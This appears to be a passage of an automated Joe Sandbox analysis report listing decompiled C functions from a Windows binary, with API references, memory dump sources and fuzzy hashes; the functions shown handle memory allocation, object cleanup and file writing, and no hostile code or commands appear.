                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 1c3626d1bd6494abab2f1438f0de401c056b6a991fd1364133f92589274b0887
                                                                                                                    • Instruction ID: 160ac9bc1cf1c7eda38e688ffa426b219b010d0ca091fadf974d54e1b01ea5fc
                                                                                                                    • Opcode Fuzzy Hash: 1c3626d1bd6494abab2f1438f0de401c056b6a991fd1364133f92589274b0887
                                                                                                                    • Instruction Fuzzy Hash: FD11E9B2401744DFC321EF65C084696FBE0BF15304F94C8AED4AA97722D7B0A548CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B177D1 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00B177D1(void** __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a19) {
				struct _FILETIME _v12;
				void* __ebp;
				void* _t17;
				char _t18;
				void* _t28;
				void** _t30;

				_t28 = __edi;
				_push(__ecx);
				_push(__ecx);
				_t30 = __ecx;
				_t17 = 0x80000000;
				_t32 =  *((char*)(__ecx + 4));
				if( *((char*)(__ecx + 4)) != 0) {
					_t17 = 0x80000100;
				}
				_t18 = E00B172B9(_t30, _t32, _a4, _t17, _a8, _a12, _a16); // executed
				_a19 = _t18;
				if(_t18 != 0 && _t30[1] != 0) {
					_v12.dwLowDateTime = _v12.dwLowDateTime | 0xffffffff;
					_v12.dwHighDateTime = _v12.dwHighDateTime | 0xffffffff;
					SetFileTime( *_t30, 0,  &_v12, 0);
				}
				_t30[1] = E00B18383(_a4);
				L00B17638(_t30, _t28, _a4);
				return _a19;
			}









                                                                                                                    0x00b177d1
                                                                                                                    0x00b177d4
                                                                                                                    0x00b177d5
                                                                                                                    0x00b177d7
                                                                                                                    0x00b177d9
                                                                                                                    0x00b177de
                                                                                                                    0x00b177e2
                                                                                                                    0x00b177e4
                                                                                                                    0x00b177e4
                                                                                                                    0x00b177f8
                                                                                                                    0x00b177ff
                                                                                                                    0x00b17802
                                                                                                                    0x00b1780a
                                                                                                                    0x00b1780e
                                                                                                                    0x00b1781c
                                                                                                                    0x00b1781c
                                                                                                                    0x00b1782f
                                                                                                                    0x00b17832
                                                                                                                    0x00b1783c

                                                                                                                    APIs
                                                                                                                    • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00B11B1A,00000000,00000002,00000002,?,00B1785D,?,00000000), ref: 00B1781C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1425588814-0
                                                                                                                    • Opcode ID: 08202fef64b5e9aa025047e375a0dd656c2d3970e8bf1a25340c855ee31c98a6
                                                                                                                    • Instruction ID: 932c621a0cf37a0f6e64106038b45a786c3f2b17f1d62df4f368ac17750d6963
                                                                                                                    • Opcode Fuzzy Hash: 08202fef64b5e9aa025047e375a0dd656c2d3970e8bf1a25340c855ee31c98a6
                                                                                                                    • Instruction Fuzzy Hash: 31018F30148249BFDF268F54CC05BEA7FF5DB05310F548289B8A5532E1CB709E90D7A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B49B27 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E00B49B27(void* __ebx, intOrPtr* __ecx) {
				void* _t10;
				void* _t11;
				intOrPtr* _t16;
				intOrPtr* _t22;
				signed int _t25;
				void* _t27;

				 *__ecx = 0xb8e0d4;
				_t16 = __ecx + 8;
				_t9 = L00B7F140(E00B867C4, _t27);
				_push(_t16);
				_t22 = _t16;
				 *((intOrPtr*)(_t27 - 0x10)) = _t22;
				_t25 =  *(_t22 + 4);
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				if(_t25 != 0) {
					_push(__ebx);
					do {
						_t9 =  *_t22;
						_t25 = _t25 - 1;
						_t13 =  *((intOrPtr*)( *_t22 + _t25 * 4));
						if( *((intOrPtr*)( *_t22 + _t25 * 4)) != 0) {
							_t11 = L00B35F61(_t13, _t13); // executed
							_t9 = E00B11E89(_t11, _t13);
						}
					} while (_t25 != 0);
				}
				_t10 = E00B11E89(_t9,  *_t22);
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t10;
			}









                                                                                                                    0x00b49b27
                                                                                                                    0x00b49b2d
                                                                                                                    0x00b4aeec
                                                                                                                    0x00b4aef1
                                                                                                                    0x00b4aef4
                                                                                                                    0x00b4aef6
                                                                                                                    0x00b4aef9
                                                                                                                    0x00b4aefc
                                                                                                                    0x00b4af02
                                                                                                                    0x00b4af04
                                                                                                                    0x00b4af05
                                                                                                                    0x00b4af05
                                                                                                                    0x00b4af07
                                                                                                                    0x00b4af08
                                                                                                                    0x00b4af0d
                                                                                                                    0x00b4af11
                                                                                                                    0x00b4af17
                                                                                                                    0x00b4af1c
                                                                                                                    0x00b4af1d
                                                                                                                    0x00b4af21
                                                                                                                    0x00b4af24
                                                                                                                    0x00b4af2f
                                                                                                                    0x00b4af37

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4AEEC
                                                                                                                      • Part of subcall function 00B35F61: __EH_prolog.LIBCMT ref: 00B35F66
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2654054672-0
                                                                                                                    • Opcode ID: 7285cc6c622ff57741b873caf3866255585f94baca69c79b90a4dbb10064469f
                                                                                                                    • Instruction ID: 4911440f853998242d473599512774d5d6bd851c63af13be47dd6c8eb1df0926
                                                                                                                    • Opcode Fuzzy Hash: 7285cc6c622ff57741b873caf3866255585f94baca69c79b90a4dbb10064469f
                                                                                                                    • Instruction Fuzzy Hash: ADF024B39006119FD714AB48D881BAAF3E8EF94320F2001AEA412AB211CBB09C00C741
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4F1B2 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E00B4F1B2(signed int __ecx, void* __edi) {
				void* _t22;
				signed int _t35;
				void* _t38;

				L00B7F140(E00B86C20, _t38);
				_push(__ecx);
				_t35 = __ecx;
				 *((intOrPtr*)(_t38 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0xb8e700;
				 *(_t38 - 4) = 5;
				E00B200A4(__ecx);
				 *(_t38 - 4) = 4;
				L00B4F04C(__ecx + 0x7c, __edi);
				 *(_t38 - 4) = 3;
				E00B11E89(E00B11E89(L00B4EF96(__ecx + 0x70, __edi),  *((intOrPtr*)(__ecx + 0x5c))),  *((intOrPtr*)(_t35 + 0x50)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				L00B4F22B(_t35);
				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t22 = E00B4EE3E( ~_t35 & _t35 + 0x00000018); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return _t22;
			}






                                                                                                                    0x00b4f1b7
                                                                                                                    0x00b4f1bc
                                                                                                                    0x00b4f1be
                                                                                                                    0x00b4f1c0
                                                                                                                    0x00b4f1c3
                                                                                                                    0x00b4f1c9
                                                                                                                    0x00b4f1d0
                                                                                                                    0x00b4f1d8
                                                                                                                    0x00b4f1dc
                                                                                                                    0x00b4f1e4
                                                                                                                    0x00b4f1f8
                                                                                                                    0x00b4f1fd
                                                                                                                    0x00b4f205
                                                                                                                    0x00b4f20a
                                                                                                                    0x00b4f215
                                                                                                                    0x00b4f219
                                                                                                                    0x00b4f222
                                                                                                                    0x00b4f22a

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4F1B7
                                                                                                                      • Part of subcall function 00B4F04C: __EH_prolog.LIBCMT ref: 00B4F051
                                                                                                                      • Part of subcall function 00B4EF96: __EH_prolog.LIBCMT ref: 00B4EF9B
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                      • Part of subcall function 00B4F22B: __EH_prolog.LIBCMT ref: 00B4F230
                                                                                                                      • Part of subcall function 00B4EE3E: __EH_prolog.LIBCMT ref: 00B4EE43
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2654054672-0
                                                                                                                    • Opcode ID: 1d455889ce29393d6af08fe97974ad1fef9c736ab84a882c3233719f7162753b
                                                                                                                    • Instruction ID: 1d53cde6550f167f493423e5f12602db6bfffdaff13515a7554a2f1743e53e41
                                                                                                                    • Opcode Fuzzy Hash: 1d455889ce29393d6af08fe97974ad1fef9c736ab84a882c3233719f7162753b
                                                                                                                    • Instruction Fuzzy Hash: 28F0F431D10750DADB19FB68D8123ADBBE0AF40304F1046DDE5A2632D2CBB85B049745
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B47394 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00B47394(void* __ebx, void* __ecx, intOrPtr* __edx) {
				short _t16;
				short _t33;
				void* _t35;

				L00B7F140(E00B86168, _t35);
				_t33 = 0;
				 *((short*)(_t35 - 0x1c)) = 0;
				 *((short*)(_t35 - 0x1a)) = 0;
				 *((intOrPtr*)(_t35 - 0x14)) = 0;
				_push(_t35 - 0x1c);
				 *((intOrPtr*)(_t35 - 4)) = 0;
				_push( *((intOrPtr*)(_t35 + 8)));
				_push(__edx);
				_t16 =  *((intOrPtr*)( *__edx + 0x20))();
				if(_t16 == 0) {
					E00B472D6(__ebx, __ecx,  *((intOrPtr*)(_t35 + 8)), __eflags,  *((intOrPtr*)(_t35 + 0xc)), _t35 - 0x1c); // executed
				} else {
					_t33 = _t16;
				}
				L00B19312(_t35 - 0x1c);
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t33;
			}






                                                                                                                    0x00b47399
                                                                                                                    0x00b473a2
                                                                                                                    0x00b473a7
                                                                                                                    0x00b473ab
                                                                                                                    0x00b473af
                                                                                                                    0x00b473b7
                                                                                                                    0x00b473b8
                                                                                                                    0x00b473bb
                                                                                                                    0x00b473be
                                                                                                                    0x00b473bf
                                                                                                                    0x00b473c4
                                                                                                                    0x00b473d6
                                                                                                                    0x00b473c6
                                                                                                                    0x00b473c6
                                                                                                                    0x00b473c6
                                                                                                                    0x00b473de
                                                                                                                    0x00b473ea
                                                                                                                    0x00b473f2

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 3c99a91ca041e1f64fd661ff85df21c5ec0418152a39883dd33ea452484ae4ba
                                                                                                                    • Instruction ID: 48176fbe41713fbf951ab145dd513b93cdf9fa8671db0ecbe17fa3b8311cdbe8
                                                                                                                    • Opcode Fuzzy Hash: 3c99a91ca041e1f64fd661ff85df21c5ec0418152a39883dd33ea452484ae4ba
                                                                                                                    • Instruction Fuzzy Hash: 17F04F72E0011AEBCB10EF98D444DAFBBB5FF94780F1081AAF415E7251DB348A05DB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B11524 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E00B11524(intOrPtr* __ecx) {
				intOrPtr _t13;
				signed int _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr* _t24;
				void* _t26;

				L00B7F140(E00B82AF2, _t26);
				_push(__ecx);
				_t24 = __ecx;
				_push(0xc); // executed
				_t13 = E00B11E55(); // executed
				_t18 = _t13;
				 *((intOrPtr*)(_t26 - 0x10)) = _t18;
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t29 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E00B12EA8(_t18, _t29,  *((intOrPtr*)(_t26 + 8)));
				}
				_t14 =  *(_t24 + 4);
				_t6 = _t14 + 1; // 0x1
				 *(_t24 + 4) = _t6;
				 *((intOrPtr*)( *_t24 + _t14 * 4)) = _t19;
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t14;
			}









                                                                                                                    0x00b11529
                                                                                                                    0x00b1152e
                                                                                                                    0x00b11530
                                                                                                                    0x00b11532
                                                                                                                    0x00b11534
                                                                                                                    0x00b1153a
                                                                                                                    0x00b1153c
                                                                                                                    0x00b1153f
                                                                                                                    0x00b11543
                                                                                                                    0x00b11545
                                                                                                                    0x00b11553
                                                                                                                    0x00b11553
                                                                                                                    0x00b11547
                                                                                                                    0x00b1154f
                                                                                                                    0x00b1154f
                                                                                                                    0x00b11555
                                                                                                                    0x00b11558
                                                                                                                    0x00b1155b
                                                                                                                    0x00b11561
                                                                                                                    0x00b11567
                                                                                                                    0x00b1156f

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B11529
                                                                                                                      • Part of subcall function 00B11E55: malloc.MSVCRT ref: 00B11E68
                                                                                                                      • Part of subcall function 00B11E55: _CxxThrowException.MSVCRT(?,00B90098), ref: 00B11E82
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionH_prologThrowmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3978722251-0
                                                                                                                    • Opcode ID: 17f1d3b5b4a3cf8d0c925931b222f8e784c44923ea96da7bf2310507605a2893
                                                                                                                    • Instruction ID: e374032472eb5c4cf2ed68c3c95ff568583f66506ac8c264e7e163b610a6a3c1
                                                                                                                    • Opcode Fuzzy Hash: 17f1d3b5b4a3cf8d0c925931b222f8e784c44923ea96da7bf2310507605a2893
                                                                                                                    • Instruction Fuzzy Hash: C2F08C72604201DBDB18DF1CD002BEEB7E1EF89304F0089AEE50AD7640DBB4A9408B44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4F101 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 50%
                                                                                                                    			E00B4F101(intOrPtr* __ecx, void* __eflags) {
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				signed int _t17;
				intOrPtr* _t22;
				void* _t24;

				L00B7F140(E00B86BCE, _t24);
				_push(__ecx);
				_t22 = __ecx;
				E00B56B33(__ecx);
				_push(0x88); // executed
				_t12 = E00B11E55(); // executed
				_t16 = _t12;
				 *((intOrPtr*)(_t24 - 0x10)) = _t16;
				_t13 = 0;
				_t28 = _t16;
				 *((intOrPtr*)(_t24 - 4)) = 0;
				if(_t16 != 0) {
					_t13 = L00B4F14D(_t16, _t28);
				}
				_t17 =  *(_t22 + 4);
				 *(_t22 + 4) = _t17 + 1;
				 *((intOrPtr*)( *_t22 + _t17 * 4)) = _t13;
				 *[fs:0x0] =  *((intOrPtr*)(_t24 - 0xc));
				return _t13;
			}









                                                                                                                    0x00b4f106
                                                                                                                    0x00b4f10b
                                                                                                                    0x00b4f10d
                                                                                                                    0x00b4f10f
                                                                                                                    0x00b4f114
                                                                                                                    0x00b4f119
                                                                                                                    0x00b4f11f
                                                                                                                    0x00b4f121
                                                                                                                    0x00b4f124
                                                                                                                    0x00b4f126
                                                                                                                    0x00b4f128
                                                                                                                    0x00b4f12b
                                                                                                                    0x00b4f12d
                                                                                                                    0x00b4f12d
                                                                                                                    0x00b4f132
                                                                                                                    0x00b4f138
                                                                                                                    0x00b4f13e
                                                                                                                    0x00b4f144
                                                                                                                    0x00b4f14c

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4F106
                                                                                                                      • Part of subcall function 00B56B33: _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B56B59
                                                                                                                      • Part of subcall function 00B11E55: malloc.MSVCRT ref: 00B11E68
                                                                                                                      • Part of subcall function 00B11E55: _CxxThrowException.MSVCRT(?,00B90098), ref: 00B11E82
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionThrow$H_prologmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3044594480-0
                                                                                                                    • Opcode ID: 004dd4ae162ad0760aa1e24997d84eb840dbd3706e9cccc1650c1e6e40a4d633
                                                                                                                    • Instruction ID: 81039b8039aadc5bc581733128931b68e5c61ab1ae4ad9789138d075c91a0e99
                                                                                                                    • Opcode Fuzzy Hash: 004dd4ae162ad0760aa1e24997d84eb840dbd3706e9cccc1650c1e6e40a4d633
                                                                                                                    • Instruction Fuzzy Hash: 24F06571A00611DFC718FF78D4016A9B7E5EF88704F10C9BEA45AE7741DB709901C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B38759 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00B38759(void* __ecx) {
				void* _t28;
				intOrPtr _t30;

				L00B7F140(0xb85254, _t28);
				_push(__ecx);
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *((intOrPtr*)(_t28 - 0x10)) = _t30;
				E00B1A98B( *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) +  *(_t28 + 8) * 4)) + 8))());
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return 0;
			}





                                                                                                                    0x00b3875e
                                                                                                                    0x00b38763
                                                                                                                    0x00b3876a
                                                                                                                    0x00b38774
                                                                                                                    0x00b3877e
                                                                                                                    0x00b38797
                                                                                                                    0x00b387a0

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 54b6da13052ef8cb4460cd3d8af3480619bfcb2963844a7b6e8404bd976a01e9
                                                                                                                    • Instruction ID: 8e6d1aaaee5e57554026d50069eb35a358d26799ade70ccb11e4bc4b4aa164fc
                                                                                                                    • Opcode Fuzzy Hash: 54b6da13052ef8cb4460cd3d8af3480619bfcb2963844a7b6e8404bd976a01e9
                                                                                                                    • Instruction Fuzzy Hash: 0EE06D36600204EFC700EF99C445F9EF7E8FB88360F108499B00A97201CB34A940CA64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B51B99 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00B51B99(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				void* _t13;
				void* _t24;

				L00B7F140(0xb86f0a, _t24);
				_push(__ecx);
				 *((intOrPtr*)(_t24 - 0x10)) = __ecx;
				E00B4F686(__edx, __eflags); // executed
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
				 *((intOrPtr*)(_t24 - 4)) = 0;
				_t13 = E00B2CD7C(__ecx + 0x40);
				 *((char*)(_t24 - 4)) = 1;
				L00B4F634(_t13, __ecx);
				 *[fs:0x0] =  *((intOrPtr*)(_t24 - 0xc));
				return __ecx;
			}





                                                                                                                    0x00b51b9e
                                                                                                                    0x00b51ba3
                                                                                                                    0x00b51ba7
                                                                                                                    0x00b51baa
                                                                                                                    0x00b51bb1
                                                                                                                    0x00b51bb4
                                                                                                                    0x00b51bb7
                                                                                                                    0x00b51bbd
                                                                                                                    0x00b51bc0
                                                                                                                    0x00b51bc7
                                                                                                                    0x00b51bcb
                                                                                                                    0x00b51bd6
                                                                                                                    0x00b51bde

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B51B9E
                                                                                                                      • Part of subcall function 00B4F686: __aulldiv.LIBCMT ref: 00B4F70F
                                                                                                                      • Part of subcall function 00B2CD7C: __EH_prolog.LIBCMT ref: 00B2CD81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$__aulldiv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 604474441-0
                                                                                                                    • Opcode ID: ede709fc2691cbf8237f9cb230d8b63459f4228bf781af0cb980f87c16e4d547
                                                                                                                    • Instruction ID: 91b4e9f7d79761e5329c228b4e4a6930b1272792e08b9e9c418f204a96c085d6
                                                                                                                    • Opcode Fuzzy Hash: ede709fc2691cbf8237f9cb230d8b63459f4228bf781af0cb980f87c16e4d547
                                                                                                                    • Instruction Fuzzy Hash: AEE06D71E01A609FCB54EFB8D1412AEBBF0BB08700F0048BEA006D3B41DBB4AA00CB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B17987 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E00B17987(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				if(_a8 > 0x400000) {
					_a8 = 0x400000;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}






                                                                                                                    0x00b17987
                                                                                                                    0x00b1798a
                                                                                                                    0x00b17993
                                                                                                                    0x00b17995
                                                                                                                    0x00b17995
                                                                                                                    0x00b1799e
                                                                                                                    0x00b179aa
                                                                                                                    0x00b179b8
                                                                                                                    0x00b179be

                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00B179AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
